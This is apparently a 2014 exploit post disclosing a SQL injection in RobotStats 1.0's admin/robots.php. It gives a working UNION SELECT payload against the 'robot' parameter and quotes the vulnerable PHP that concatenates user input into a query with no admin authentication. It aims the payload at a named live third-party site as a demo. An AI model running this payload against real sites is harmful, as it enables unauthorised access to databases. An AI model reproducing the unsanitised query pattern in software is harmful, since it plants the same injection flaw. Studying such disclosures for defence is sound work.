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RobotStats 1.0 SQL Injection

Posted on 25 November 2014

# Title : RobotStats v1.0 (robot param) SQL Injection Vulnerability # Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com # Home : http://milw00rm.com / its online # Twitter : https://twitter.com/milw00rm or @milw00rm # Date : 22.11.2014 # Demo : http://alpesoiseaux.free.fr/robotstats/ # Download : http://www.robotstats.com/en/robotstats.zip # Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others # Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) ) sql inj.: target.com/robotstats/admin/robots.php?rub=modif&robot=0x90+union+select+1,2,3,4,5,database(),7,8,9,10 you look other files for sql example (/robotstats/info-robot.php?robot=?) analysis: (/admin/robots.php) no security for admin folder (session control, login panel or anyone... maybe its different vulnerability) include "robots.lib.php"; //line 26 else if ($rub == "modif") { formulaireRobot($robot); //line 44 (we will be analysis to robots.lib.php for line) } analysis: (/admin/robots.lib.php) function formulaireRobot($robot) //line 71 (remember function line 44 in robots.php) { global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP; if ($robot != -1) { $title = $RS_LANG["ModifyRobot"]; $sql = "SELECT *"; $sql .= " FROM ".$RS_TABLE_ROBOTS; $sql .= " WHERE id=".$robot; // line 80 (ver yansin amuga goyum!!!) $res = mysql_query($sql) or erreurServeurMySQL($sql); $enr = mysql_fetch_array($res); $rub = "modif"; $actif = $enr["actif"]; } //line 85 for demo: http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=modif&robot=0x90+union+select+1,2,3,4,5,database(),7,8,9,10